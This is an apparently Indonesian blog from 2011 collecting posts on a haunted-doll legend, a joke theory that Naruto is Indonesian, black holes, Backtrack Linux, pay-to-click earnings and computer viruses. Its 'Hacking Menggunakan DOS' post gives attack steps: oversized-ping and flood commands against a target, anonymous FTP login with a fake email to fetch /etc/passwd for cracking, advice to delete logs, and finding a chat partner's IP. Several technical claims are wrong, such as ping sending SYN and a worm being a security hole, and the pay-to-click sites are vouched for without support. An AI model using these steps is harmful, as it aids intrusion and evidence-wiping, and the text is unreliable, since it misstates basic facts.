∆LMERI∆

Translate

Kamis, 21 April 2011

Boneka Okiku dari Jepang, Boneka Setan Yang Penuh Misteri

Menurut penuturan orang yang pernah melihat boneka ini, boneka ini memang seram dengan segala nuansa non logisnya. Bagaimana bisa benda mati bisa menumbuhkan rambutnya terus menerus. Hampir seperti jenglot, boneka ini benar-benar di luar nalar. Seorang peneliti jepang mengungkapkan bahwa dari hasil uji forensik rambut yang ditumbuhkan boneka ini sama persis dengan rambut pada anak usia 10 tahun.


Nama Okiku ini diambil dari seorang anak yang sedang bermain dengan boneka dengan ukuran tinggi 40 sentimeter, berpakaian kimono dengan mata hitam seperti manik-manik dan rambut yang lebat. Boneka Okiku telah ada di kuil Mannenji di kota Iwamizawa Prefektur Hokkaido) sejak tahun 1938.

Awalnya boneka ini dibeli tahun 1918 oleh seorang pemuda bernama Eikichi Suzuki di sapporo, Di sana ia melihat sebuah boneka cantik Jepang dengan Kimono. Boneka ini dibeli Eikichi untuk adiknya yang berumur 2 tahun yang bernama Okiku, anak ini sangat menyenangi boneka ini dan memainkannya setiap hari.


Tapi sayang, Okiku meninggal tak lama setelah itu karena demam. Kemudian pada saat pemakamannya, Keluarga ingin memasukkan boneka ke dalam peti mati-nya tapi entah mengapa mereka lupa. Keluarga gadis tersebut kemudian menempatkan boneka itu di altar rumah tangga dan berdoa untuk setiap hari dalam rangka memperingati Okiku.

Beberapa waktu kemudian, mereka melihat rambut mulai tumbuh.Menurut cerita ini merupakan roh dari gadis itu yang berlindung di dalam boneka itu.


Tahun 1938 keluarga Suzuki pindah ke shakalin, boneka okiku akhirnya dititipkan di kuil Mannenji di Hokkaido. Menurut pendeta di kuil itu, boneka tradisional jepang selalu berambut pendek, dia juga membenarkan kalau rambut boneka okiku terus memanjang, walaupun dipotong terus secara berkala, tapi rambutnya tumbuh terus. Menurut kuil, boneka tradisional awalnya memiliki rambut dipotong pendek, tapi seiring waktu terus bertambah panjang sekitar 25 sentimeter, hingga ke lutut boneka.Meskipun rambut boneka ini dipotong secara berkala , namun menurut cerita rambut tersebut tumbuh lagi.


Cerita ini telah menginspirasi berbagai macam film-film horor jepang populer salah satunya adalah film Haunted School.

Selasa, 19 April 2011

Ternyata Film Naruto terinspirasi dari Indonesia

Naruto
Berikut data-data yang berhasil di kumpulkan sebagai bukti Naruto adalah orang Indonesia:
Asal nama Naruto = Narto
Mungkin yang pernah belajar Bahasa Jepang, tahu hal ini. Lidah orang Jepang itu agak “belibet”, jadi ada perbedaan pengucapan orang Jepang untuk kata dengan konsonan yang dobel. Misal: Dragon > Duragon, Restoran > Resutoran, dll.
Makanya, jadilah si Narto itu menjadi Naruto di Jepang…
Bantuan dari ahlinya:
tapi kalo dari soal nama ada benernya juga sih…. NARUTO ditulisnya pake hurup KATAKANA bukannya HIRAGANA, berarti NARUTO itu adalah nama yang berasal dari luar jepang (asing), kalo nama jepang selalu ditulis dengan HIRAGANA….. dan NARUTO adalah memang berasal dari NARTO….. tapi apakah Masashi Kisimoto Sensei membuat nama karakter Naruto dari kata Narto?? Hanya dia yang tahu…
Bantuan dari yang lebih gila:
Naruto Shippuden = Narto Syaifudin
Asal Negara
Naruto dikisahkan berasal dari negara Api dengan iklim yang cerah dan hangat. Dimana lagi negara tropis dengan banyak gunung api aktif, selain di negara kita tercinta?…
Dan yang perlu anda tahu, INDONESIA ADALAH NEGARA YANG MEMILIKI POTENSI ENERGI PANAS BUMI (GEOTHERMAL) TERBESAR DI DUNIA…
Desa Tempat Tinggal
Penggemar serial ini pasti tahu Desa Konoha, yang berarti Desa Daun.
Agan tahu di manakan letak Desa Daun yang sesungguhnya?..
Coba cek di google: Desa Daun terletak di Kecamatan Sangkapura, letaknya di Pulau Bawean, Jawa Timur.
Ini dia penampakan salah satu sudut Desa Daun
Liat papan nama di gapuranya
Dan disinilah letaknya
Pemimpin Desa Konoha (Hokage)=Presiden RI
Kaya’nya udah berkali-kali postingan tentang ini.  Ane ulang dikit aja:
  1. Hokage Pertama: Senju Hasirama, Founding Father-nya Konoha. Presiden Soekarno dikenal sebagai Founding Father-nya Indonesia.Hokage Kedua, Senju Tobirama, adalah penerus dari Shodaime. Soeharto adalah penerus dari Soekarno. Rambut putih menjadi ciri khas mereka berdua.
  2. Prof.BJ.Habibie dikenal sebagai Presiden yang paling pintar. Hokage Ketiga, Sarutobi, adalah Hokage yang mempunyai julukan “The Professor”, karena mengetahui & menguasai segala jurus di Konoha
  3. Hokage Keempat, Namikaze Minato, menjadi Hokage hanya sebentar, karena dia mati muda. Gusdur dikenal juga menjabat sebagai presiden dalam waktu singkat (2 tahun), karena dilengserkan.
  4. Hokage Kelima, Tsunade, adalah hokage wanita pertama Konoha, dan merupakan keturunan langsung Hokage pertama. Megawati adalah Presiden wanita pertama Indonesia, merupakan putri Presiden pertama
  5. Presiden Keenam RI adalah SBY. Hokage keenam belum ada, karena ketika Tsunade terluka Danzo hanya menjadi pejabat sementara. Calon terkuat adalah Hatake Kakashi, gurunya Naruto. Keduanya sama-sama cakep dan gagah. Coba tanya ibu-ibu yang milih SBY…

Apakah SBY=Danzo?

danzo=SBY
Danzo Anbu masa pemerintahan Tsunade
SBY Menhankam masa Megawati
Setahu ane, Danzo itu hanya pejabat sementara, yang menggantikan Tsunade waktu sakit parah. Jadi belum resmi menjadi hokage keenam. Para Tetua menyarankan agar Danzo sementara menjalankan tugas Hokage, untuk ikut pertemuan para Hokage.
Justru saat kekacauan itu, para shinobi dari Konoha lebih memilih Kakashi untuk menjadi Hokage. Apalagi setelah Danzo terbukti “berkhianat” dan kemudian tewas. Walaupun nggak jadi karena Tsunade sehat kembali, dan dapat bertugas menjadi Hokage…
Kondisi ini mirip dengan presiden kita. SBY adalah presiden pertama yang dipilih langsung oleh rakyat. Kalau yang sebelumnya, kan dipilih oleh MPR/DPR, kalau di Konoha ada Dewan Penasihat (Elder) gitu…
Tingkatan Ninja=Tingkatan TNI/POLRI
Berikut tingkatan ninja dalam serial Naruto, dan terjemahannya kalau di Indonesia:
1. Genin > tamtama
2. Chunin > bintara
3. Jonin > perwira
4. Tokubetsu Jonin/Special Jonin > perwira menengah
5. Jonin Hancho/Commander Jonin > perwira tinggi/jenderal
Nah, lima bukti tersebut apakah masih meragukan? Mungkin agan-sista penggemar Naruto ada yang punya bukti lain…
Dan, inilah sosok Pak Narto yang sebenarnya:
Maaf gan, Pak Narto ini orangnya pemalu, jadi gak mau nunjukin wajahnya. Tapi, mirip dengan gambar Naruto yang di atas, kan? Paling nggak baju dan apinya, lah…
Jubah Akatsuki=Motif Batik Cirebon
Penggemar Naruto pasti tahu dengan Akatsuki, yang sekarang ini menjadi musuh utama para Shinobi di semua negara. Agan pasti juga familiar dengan jubah yang menjadi kostum para anggota Akatsuki
Nah, tak disangka tak diduga, ternyata, motifnya mengambil dari batik Mega Mendung dari Cirebon!…
Kagak percaya? Ini penampakannya
Makanan Kesukaan Naruto, Ada di Jogja
Agan-sista penggemar Naruto, pasti tahu makanan kesukaan Naruto kan?
Dan atas informasi dari Jogja, ternyata makanan kesukaan Naruto udah ada di Jogja…
Itu aslinya si (pak) Narto lagi makan di dalam warung

Jumat, 15 April 2011

Black Hole

Black Hole/Lubang hitam adalah sebuah pemusatan massa yang cukup besar sehingga menghasilkan gaya gravitasi yang sangat besar. Gaya gravitasi yang sangat besar ini mencegah apa pun lolos darinya kecuali melalui perilaku terowongan kuantum. Medan gravitasi begitu kuat sehingga 8kecepatan lepas di dekatnya mendekati kecepatan cahaya. Tak ada sesuatu, termasuk radiasi elektromagnetik yang dapat lolos dari gravitasinya, bahkan cahaya hanya dapat masuk tetapi tidak dapat keluar atau melewatinya, dari sini diperoleh kata "hitam". Istilah "lubang hitam" telah tersebar luas, meskipun ia tidak menunjuk ke sebuah lubang dalam arti biasa, tetapi merupakan sebuah wilayah di angkasa di mana semua tidak dapat kembali. Secara teoritis, lubang hitam dapat memliki ukuran apa pun, dari mikroskopik sampai ke ukuran alam raya yang dapat diamati.
Teori adanya lubang hitam pertama kali diajukan pada abad ke-18 oleh John Michell and Pierre-Simon Laplace, selanjutnya dikembangkan oleh astronom Jerman bernama Karl Schwarzschild, pada tahun 1916, dengan berdasar pada teori relativitas umum dari Albert Einstein, dan semakin dipopulerkan oleh Stephen William Hawking. Pada saat ini banyak astronom yang percaya bahwa hampir semua galaksi dialam semesta ini mengelilingi lubang hitam pada pusat galaksi. Adalah John Archibald Wheeler pada tahun 1967 yang memberikan nama "Lubang Hitam" sehingga menjadi populer di dunia bahkan juga menjadi topik favorit para penulis fiksi ilmiah. Kita tidak dapat melihat lubang hitam akan tetapi kita bisa mendeteksi materi yang tertarik / tersedot ke arahnya. Dengan cara inilah, para astronom mempelajari dan mengidentifikasikan banyak lubang hitam di angkasa lewat observasi yang sangat hati-hati sehingga diperkirakan di angkasa dihiasi oleh jutaan lubang hitam. Lubang Hitam tercipta ketika suatu obyek tidak dapat bertahan dari kekuatan tekanan gaya gravitasinya sendiri. Banyak obyek (termasuk matahari dan bumi) tidak akan pernah menjadi lubang hitam. Tekanan gravitasi pada matahari dan bumi tidak mencukupi untuk melampaui kekuatan atom dan nuklir dalam dirinya yang sifatnya melawan tekanan gravitasi. Tetapi sebaliknya untuk obyek yang bermassa sangat besar, tekanan gravitasi-lah yang menang. Massa dari lubang hitam terus bertambah dengan cara menangkap semua materi didekatnya. Semua materi tidak bisa lari dari jeratan lubang hitam jika melintas terlalu dekat. Jadi obyek yang tidak bisa menjaga jarak yang aman dari lubang hitam akan terhisap. Berlainan dengan reputasi yang disandangnya saat ini yang menyatakan bahwa lubang hitam dapat menghisap apa saja disekitarnya, lubang hitam tidak dapat menghisap material yang jaraknya sangat jauh dari dirinya. dia hanya bisa menarik materi yang lewat sangat dekat dengannya. Contoh : bayangkan matahari kita menjadi lubang hitam dengan massa yang sama. Kegelapan akan menyelimuti bumi dikarenakan tidak ada pancaran cahaya dari lubang hitam, tetapi bumi akan tetap mengelilingi lubang hitam itu dengan jarak dan kecepatan yang sama dengan saat ini dan tidak terhisap masuk kedalamnya. Bahaya akan mengancam hanya jika bumi kita berjarak 10 mil dari lubang hitam, dimana hal ini masih jauh dari kenyataan bahwa bumi berjarak 93 juta mil dari matahari. Lubang hitam juga dapat bertambah massanya dengan cara bertubrukan dengan lubang hitam yang lain sehingga menjadi satu lubang hitam yang lebih besar.

Rabu, 13 April 2011

Hacking with Backtrack 4

Apa yang ada di pikiran para sobat saat mendengar kata Linux Backtrack ?
Pasti para sobat langsung terpikir Hacking. Ya... sobat Hacker anda tidak salah, karena Linux Backtrack menyediakan banyak fitur Hacking diantaranya adalah aplikasi penguji keamanan LAN, WIFI, WAN, Aplikasi penguji keamanan Website, Aplikasi penguji keamanan aplikasi seperti reverse enginering dll. sangat banyak sekali sampai-sampai saya bingung sendiri untuk belajar menggunakannya.

Backtrack sangat cocok digunakan bagi Sistem analys yang bertugas menjaga kemanan sistem informasi baik itu dalam bentuk aplikasi, jaringan ataupun website. jika digunakan oleh orang yang “kurang bertanggungjawab” backtrack bisaberubah menjadi alat yang sangat mengerikan. bayangkan jika sistem jaringan dan aplikasi perusahaan anda dipenetrasi menggunakan distro ini dan kemudian data-data penting dicuri atau bahkan dimanipulasi. Bercermin dari ilustrasi diatas, ada baiknya bagi profesional IT yang kebetulan memiliki tugas sebagai Security maintainer belajar untuk memahami dan menggunakan distro Backtrack.

untuk mendownload distro backtrack, anda bisa langsung download di www.backtrack-linux.org/downloads/ . Dan untuk instalasinya silahkan lihat Video Tutorial berikut ini.



Sesuai dengan judul posting ini yaitu Hacking with Backtrack 4, maka anda wajib melihat Video Tutorial Hacking wireless with Backtrack 4 berikut ini.

Sekilas Tentang Linux Backtrack

BackTrack adalah salah satu distro linux yang merupakan turunan dari slackware yang mana merupakan merger dari whax dan auditor security collection. Backtrack dua dirilis pada tanggal 6 maret 2007 yang memasukkan lebih dari 300 tool security sedangkan versi beta 3 dari backtrack dirilis pada tanggal 14 desember 2007 pada rilis ketiga ini lebih difokuskan untuk support hardware. Sedangkan versi backtrack 3 dirilis pada tanggal 19 juni 2008 pada backtrack versi 3 ini memasukkan saint dan maltego sedangkan nessus tidak dimasukkan.
Tetapi tetap memakai kernel versi 2.6.21.5., pada BackTrack 4 Final sekarang ini menawarkan kernel linux terbaru yaitu kernel 2.6.30.4. Dilengkapi juga dengan patch untuk wireless driver untuk menanggulangi serangan wireless injection (wireless injection attacks).

Fitur dari backtrack diantaranya adalah :
  • Metasploit integration
  • RFMON wireless drivers
  • Kismet
  • AutoScan-Network - AutoScan-Network is a network discovering and managing application
  • Nmap
  • Ettercap
  • Wireshark (formerly known as Ethereal)
  • Enumeration
  • Exploit Archives
  • Scanners
  • Password Attacks
  • Fuzzers
  • Spoofing
  • Sniffers
  • Tunneling
  • Wireless Tools
  • Bluetooth
  • Cisco Tools
  • Database Tools
  • Forensic Tools
  • BackTrack Services
  • Reversing
  • Misc
Di samping itu backtrack juga memasukkan mozilla, pidgin, k3b, xmms dll, masih banyak lagi fitur yang diberikan maaf enggak bisa di sebutkan semua, karena masih banyak fitur yang saya belum mengerti.

Senin, 11 April 2011

Bisnis Online yang Paling Mudah

Diantara semua Bisnis online, menurut saya yang paling mudah dan gak bakalan bikin kita rugi adalah Paid To Click (PTC).
ya.. karna bisnis jenis PTC ini hanya menuntut kita untuk mengklik sebuah iklan atau link dan dollar demi dollar mengalir ke Account kita.
Dibawah ini adalah beberapa jenis bisnis PTC yang terbukti telah membayar dan tidak menipu.













WordLinx - Get Paid To Click

LinkGrand.com

Minggu, 10 April 2011

Hacking Menggunakan DOS

Microsoft DOS datang dengan beberapa hacking tool tersembunyi yang akan saya diskusikan disini. Tool ini dapat ditemukan pada direktori c:\windows jika anda menggunakan win98 dan jika anda menggunakan winxp maka tool ini berada pada C:\winxp\system32. WinXP, Win2000 dan WinNT dirilis dengan beberapa tool internet tambahan. Jadi jika anda masih menggunakan win98 maka saya menyarankan agar menggantinya dengan WinXP. Yang tentunya memiliki fitur securiti tambahan dan perintah hacking internet yang bagus. Dalam manual ini saya akan membahas mengenai beberapa perintah yang ditemukan pada Win98 dan winXP

Jadi bagi pengguna window, berikut ini perintah-perintah hacking pada DOS.

1. ping
2. tracert
3. telnet
4. ftp
5. netstat

OK, inilah keterangannya.

1. ping

Utiliy ini digunakan untuk mencari keberadaan remote host. Yan gmengirmkan sebuah signal SYN ke remote host dan jika remote host membalas maka berarti memang ada suatu remote machine.

Cobalah anda ketik perintah ini:

C:\windows>ping/?

*************
Newbie tip: mengetik '/?' setelah perintah dos menampilkan helpnya. Jadi bagaimana anda belajar aneka perintah dos. Bukankah WinXP, WinNT dan Win2000 juga memiliki perintah ‘help’ untuk menampilkan seluruh perintah dos.
*************
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list

Options:
-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.

Jadi saya dapat melakukan ping ke ip address apapun atau domain name untuk memeriksa keberadaannya di internet. Sebagai contoh saya mengetik “ping localhost” maka saya mendapatkan.


Pinging chintan [127.0.0.1] with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128

Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

************
Newbie tip: 'localhost' adalah ip 127.0.0.1 dan merupakan ip address kita sendiri. Juga dikenal sebagai loopback ip. Tapi saat anda terhubung ke internet anda akan diberi ip baru oleh isp anda sebagai identifikasi diri anda. Anda dapat mencari tahu ip anda dengan mengetik”winipcfg” pada menu Start-Run bagi pengguna Win98, sedangkan yang lainnya hanya mengetikkan “ipconfig” pada command prompt.
***********

Hal ini menunjukkan kepada saya bahwa 32 byte data dikirim ke 127.0.0.1 dan dibalas kembali kurang dari 10ms. TTL adalah Time To Live dan nilai range dari 0 hingga 255 (default 128). Sekarang biar kita lihat apa yang terjadi jika saya mengetik “ping www.yahoo.com

Pinging www.yahoo.akadns.net [66.218.71.87] with 32 bytes of data:

Reply from 66.218.71.87: bytes=32 time=3448ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2276ms TTL=54
Reply from 66.218.71.87: bytes=32 time=1799ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2850ms TTL=54

Ping statistics for 66.218.71.87:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1799ms, Maximum = 3448ms, Average = 2593ms

Tapi bagaimana ping tersebut digunakan oleh para hacker? Baiklah, ada dua opsi ‘|’ dan ‘-t’ yang mematikan. -| digunakan untuk spesifikasi ukuran buffer yang dikirimkan (defaultnya 32 byte) bagaimana jika saya mengetik “ping -| 65600 target.com” maka hal ini akan membawa maut 65600 paket data ke target.com yang lebih tinggi dari kapasitas TCP/IP 65535. Tindakan ini menyebabkan target.com menjadi hang dan harus di restart.

Dan jika saya mengetik “ping –t target.com” hal ini akan meneruskan pengiriman 32 byte data ke target.com hingga menghabiskan resource dan menyebabkan hang. Dua jenis serangan diatas dikenal sebagai ping attack bagi penyerang Dos.

***********
Newbie tip: 'Dos' yang terakhir disebutkan adalah Denial of service yang dilancarkan oleh hacker untuk menghentikan service pada remote machine.
***********
Catatan: Jenis serangan ini dimasa lalu sering digunakan, namun saat ini pada sistem yang telah diperbarui hal tersebut tidak akan bekerja lagi.

2. Tracert

Perintah Tracert melakukan penjejakan ke remote machine. Sebelum request kita menjangkau remote machine melalui router yang berbeda diantaranya. Tool tracert (dikenal sebagai ‘traceroute’ pada unix) pada awalnya dirancang untuk mencari router mana yang mengalami masalah. Perintah tersebut menunjukkan ip address router yang dilalui request kita sebelum menjangkau remote maching. Sebagai contoh, jika saya mengetik “tracert www.yahoo.com” pada dos prompt maka akan terdapat:

Tracing route to www.yahoo.akadns.net [66.218.71.87]
over a maximum of 30 hops:

1 * 2296 ms 2025 ms dialpool-210-214-55-11.maa.sify.net [210.214.55.11]
2 2446 ms 2025 ms 2301 ms dialpool-210-214-55-2.maa.sify.net [210.214.55.2]
3 1899 ms 2066 ms 2450 ms lan-202-144-32-177.maa.sify.net [202.144.32.177]
4 * 2885 ms 2749 ms lan-202-144-83-4.maa.sify.net [202.144.83.4]
5 * * * Request timed out.
6 * * * Request timed out.
7 * * * Request timed out.
8 * * * Request timed out.
9 * * * Request timed out.
10 * 3408 ms * www.yahoo.akadns.net [66.218.71.87]
11 * * * Request timed out.
12 * * * Request timed out.
13 * * * Request timed out.
14 * * * Request timed out.
15 * * * Request timed out.
16 * * * Request timed out.
17 482 ms 698 ms 624 ms w8.scd.yahoo.com [66.218.71.87]
Trace complete.

Baris pertama memberitahukan kita ip mana yang menjejaki dan kemudian jumlah hop. Jumlah hop tergantung pada jumlah server yang ada diantaranya. Setelah memulai tracing. Request pertama saya melalui sify.net (nama ISP server saya) kemudian melalui server yang berbeda dan terakhir menjangkau w8.scd.yahoo.com. Jadi kita dapat melihat berapa lama prosedurnya. Kapanpun anda membuka www.yahoo.com dalam web browser, request anda selalu melalui isp dulu (untuk mendapatkan ip dari www.yahoo.com dari daftar nama domainnya) kemudian server lain dalam jalur tersebut dan terakhir pada yahoo.

Jadi bagaimana tracert digunakan oleh para hacker. Perintah ini digunakan untuk mencari firewall dan melumpuhkannya. Tracer digunakan bersamaan dengan nmap dapat mengetahui ip sebenarnya dimana firewall terpasang, kemudian hacker tersebut akan melumpuhkannya. Untuk contoh diatas kita melihat bahwa proses tracing terhenti pada w8.scd.yahoo.com. Namun hal ini bukanlah tujuan sebenarnya. Hal itu dikarenakan dihentikan oleh firewall. Mengenai masalah firewall akan kita bahas dalam artikel tersendiri.


3. Telnet

Jika anda menggunakan windows maka ‘telnet’ merupakan hacking tool terhebat bagi anda. Sebenarnya merupakan sebuah terminal yang dapat mengakses remote machine dan menggunakan service-nya. Melalui telnet anda dapat menentukan suatu koneksi antara mesin anda dan remote machine melalui port tertentu.


***********
Newbie tip: Disini saya membicarakan tentang virtual port. Tidak secara fisik yang anda lihat dibalik CPU anda. Hanya sebagai physical port yang digunakan untuk koneksi ke hardware dan dengan cara yang sama virtual port digunakan untuk koneksi pada software. TCP/IP memiliki 65,535 virtual port.
***********
Jika anda mengentik “telnet target.com” maka anda terhubung ke target.com pada prot no. 23 (port yang menjalankan telnet service). Anda juga bisa terhubung ke suatu port lainnya dengan mengetik nomor port setelah target.com. sebagai contoh jika saya ingin terhubung ke port no. 25 (SMTP service) maka salya akan mengetik “telnet target.com 25”.
***********
Newbie tip: Setiap port menjalankan service tertentu. Untuk mendaptkan daftar service yang dijalankan pada port tertentu yang bukalah “C:\windows\services" pada notepad.
***********
Sesaat anda terhubung ke sebuah remote machine pada port tertentu, sebuah window popup telnet dengan daemon yang menjalankan port tersebut menunggu anda mengetikkan perintah. Sebagai contoh “telnet www.cyberspace.org” maka seperti gambar dibawah inilah yang saya dapatkan.


Saya harus login disana dan mengetik suatu password dan saya mendapatkan linux shell prompt. Baiklah jika anda mengetikan newuser disana untuk mendapatkan sebuah LoginID dan Password. Dan stelah itu saya menyiapkan perintah untuk mengeksekusi secara remote.

Well, www.cyberspace.org memiliki server Linux. Jadi jika anda tidak familiar dengan Linux anda tidak akan mampu menggunakan service-nya.



4. FTP

FTP adalah File Transfer Protocol. Melalui ini anda dapat mendownload atau mengupload file. Dan apa yang hacker inginkan dari ini? Benar!! Tinggal mengeti “ftp target.com” dan daemon banner akan ditampilkan. Tapi disini, dengan tujuan menampilkan file transfer pertama kali anda harus login. Beberapa website mengijinkan adanya naonymous login. Contohnya mengetikkan login “anonymous” dan email-address anda sebagai password. Tentunya anda harus mengetikkan email palsu. Sekarang anda boleh mulai mendownload dan mengupload file. Namun untuk itu anda adanya suatu perintah. Pada FTP prompt anda dapat mengetikkan “?”. Maka akan ditampilkan sbb:


! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary globe mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir

Untuk mendaptkan bantuan pada berbagai perintah contohnya perintah delete, mengetikan “? Delete”. Beberapa perintah penting lainnya adalah:

1. 'pwd' to know the present directory at remote machine.
contohnya. ftp>pwd
/etcme
2. 'lcd' to change the local directory.
contohnya. ftp>lcd C:\windows
local directory now C:\windows
3. 'cd' to change the remote directory.
contohnya. ftp>cd /etc
remote directory now /etc
4. 'mput' to send multiple files to remote machine.
contohnya. ftp>mput *.*
sends all files from C:\windows to /etc
5. 'mget' to get multiple files from remote machine.
contohnya. ftp>mget *.*
gets all files from /etc to C:\windows
6. 'open' to establish a connection with remote host.
contohnya. ftp>open www.target.com
7. 'bye' closes the connection and quits from ftp

Untuk perintah lainnya dari ftp silakan lihat help mereka.

Sekarang pada yang port FTP (prot 21) adalah membuka www.nosecurity.com. Seorang hacker akan terhubung ke situs tersebut menggunakan “ftp www.nosecurity.com” pada dos prompt. Kemudian dia akan mencoba login secara anonymous. Dengan anggapan bahwa www.nosecurity.com menggunakan linux server, maka hacker tersebut akan mengtikkan perintah “get /etc/apsswd” untuk mendaptkan file password dan mengcracknya. Jika anda adalah seorang hacker, maka jangan lupa untuk menghapus log tersebut.



5. netstat

Anda dapat menentukan suatu koneksi dengan remote machine pada port tertentu, hanya saat port tersebut dibuka pada remote machine. Sebagai contoh, jika anda ingin menentukan sebuah koneksi dengan www.target.com pada port 23 (telnet) maka port tersebut seharusnya terbuka pada www.target.com. Dan seluruh aktifitas hacking umumnya menggunakan port yang terbuka. Mengetikkan “netstat ” pada dos prompt memberikan:


Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s
option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.

Opsi akan menjelaskan fungsinya masing-masing. Dan yang terpenting adalah opsi –a dan –n. Opsi –a menampilkan seluruh port yang terbuka pada mesin tersebut. Dan jika saya menggunakan opsi –n maka akan menunjukkan ip address sebagai ganti dari domain. Saya mendapatkan hal berikut ini jika saya mengetik “netstat –a” pada command prompt.


Active Connections

Proto Local Address Foreign Address State
TCP chintan:1027 0.0.0.0:0 LISTENING
TCP chintan:80 0.0.0.0:0 LISTENING
TCP chintan:135 0.0.0.0:0 LISTENING
TCP chintan:6435 0.0.0.0:0 LISTENING
TCP chintan:1025 0.0.0.0:0 LISTENING
TCP chintan:1026 0.0.0.0:0 LISTENING
TCP chintan:1028 0.0.0.0:0 LISTENING
TCP chintan:1309 0.0.0.0:0 LISTENING
TCP chintan:1310 0.0.0.0:0 LISTENING
TCP chintan:1285 rumcajs.box.sk:80 ESTABLISHED
TCP chintan:1296 l an-202-144-78-3.maa.sify.net:80 CLOSE_WAIT
TCP chintan:1297 lan-202-144-65-14.sify.net:80 ESTABLISHED
TCP chintan:1310 cdn-v13.websys.aol.com:80 ESTABLISHED
TCP chintan:1220 aiedownload.cps.intel.com:ftp ESTABLISHED

”Proto” menyatakan nama protocol tersebut, “localaddress” memberikan ipaddress kita dan port yang terbuka. “Foreign Address” menyatkaan ipaddress dengan namor port yang terhubung ke kita. “State” menyatakan pernyataan saat ini jika suatu koneksi “established” atau listening atau hanya “waiting”.

Sebagai contoh jika saya membuka http://www.yahoo.com maka saat saya menjalankan “netstat –a” saya akan mendapatkan masukan seperti ini:

"TCP 203.43.50.81:2034 www.yahoo.com:80 ESTABLISHED"

Komputer saya dengan ip 203.43.50.81 melalui port 2034 terhubung dengan yahoo pada port 80


*************
Newbie tip: Dengan cara ini anda bisa mendapatkan ip seseorang yang chatting dengan ada. Pertama kali jalankan “netstat –an” dan lihat dibawah foreign ip address. Sekarang mulailah private chating dengan orang lain. Juga jalankan “netstat –an” dan anda akan mendapatkan satu lagin foreign ip pada akhirnya. Inilah ip orang tersebut.
*************

Sabtu, 09 April 2011

VIRUS KOMPUTER


Arti Definisi / Pengertian Virus Dan Kawan-Kawan (Varian Virus) :
1.      Arti Definisi / Pengertian Virus Komputer
Virus komputer adalah suatu program komputer yang menduplikasi atau menggandakan diri dengan menyisipkan kopian atau salinan dirinya ke dalam media penyimpanan / dokumen serta ke dalam jaringan secara diam-diam tanpa sepengetahuan pengguna komputer tersebut. Efek dari virus komputer sangat beragam mulai dari hanya muncul pesan-pesan aneh hingga merusak komputer serta menghapus file atau dokumen kita.
2.      Arti Definisi / Pengertian Varian Virus Worm, Trojan Dan Spyware

a.       Worm
Worm adalah lubang keamanan atau celah kelemahan pada komputer kita yang memungkinkan komputer kita terinfeksi virus tanpa harus eksekusi suatu file yang umumnya terjadi pada jaringan.
b.      Trojan
Trojan adalah sebuah program yang memungkinkan komputer kita di control orang lain melalui jaringan atau internet.
c.       Spyware
Spyware adalah aplikasi yang membocorkan data informasi kebiasaan atau perilaku pengguna dalam menggunakan komputer ke pihak luar tanpa kita sadari. Biasanya digunakan oleh pihak pemasang iklan.

Jika kita melihat kejanggalan pada media penyimpanan seperti file bernama aneh yang tidak pernah kita buat atau file bukan jenis aplikasi / application tetapi mengaku sebagai aplikasi maka jangan kita klik, kita buka atau kita jalankan agar virus komputer tersebut tidak menular ke komputer yang kita gunakan.
Tanda-tanda/ciri-ciri komputer kita terkena/ terinfeksi virus komputer :
-         Komputer berjalan lambat dari normal
-         Sering keluar pesan error atau aneh-aneh
-         Perubahan tampilan pada komputer
-         Media penyimpanan seperti disket, flashdisk, dan sebagainya langsung mengkopi file aneh tanpa kita kopi ketika kita hubungkan ke komputer.


-         Komputer suka restart sendiri atau crash ketika sedang berjalan.
-         suka muncul pesan atau tulisan aneh
-         komputer hang atau berhenti merespon kita.
-         Harddisk tidak bisa diakses
-         Printer dan perangkat lain tidak dapat dipakai walaupun tidak ada masalah hardware dan software driver.
-         Sering ada menu atau kotak dialog yang error atau rusak.
-         Hilangnya beberapa fungsi dasar komputer.
-         Komputer berusaha menghubungkan diri dengan internet atau jaringan tanpa kita suruh.
-         File yang kita simpan di komputer atau media penyimpanan hilang begitu saja atau disembunyikan virus, dan lain-lain.
Contoh bentuk media penyebaran virus komputer dari komputer yang satu ke komputer lain :
-         media penyimpanan (disket, flashdisk, harddisk eksternal, zipdisk, cd, dvd, bluray disc, catridge, dan lain sebagainya)
-         jaringan lan, wan, man, internet dan lain sebagainya.
-         File attachment atau file lampiran pada email atau pesan elektronik lainnya.
-         File software (piranti lunak) yang ditunggangi virus komputer.
Cara yang paling ampuh agar kita tidak terkena virus komputer adalah dengan cara menginstall program komputer yang orisinil atau asli bukan bajakan yang tidak ditunggangi virus dan kawan-kawan, tidak menghubungkan komputer dengan jaringan internet, serta tidak pernah membuka atau mengeksekusi file yang berasal dari komputer lain.
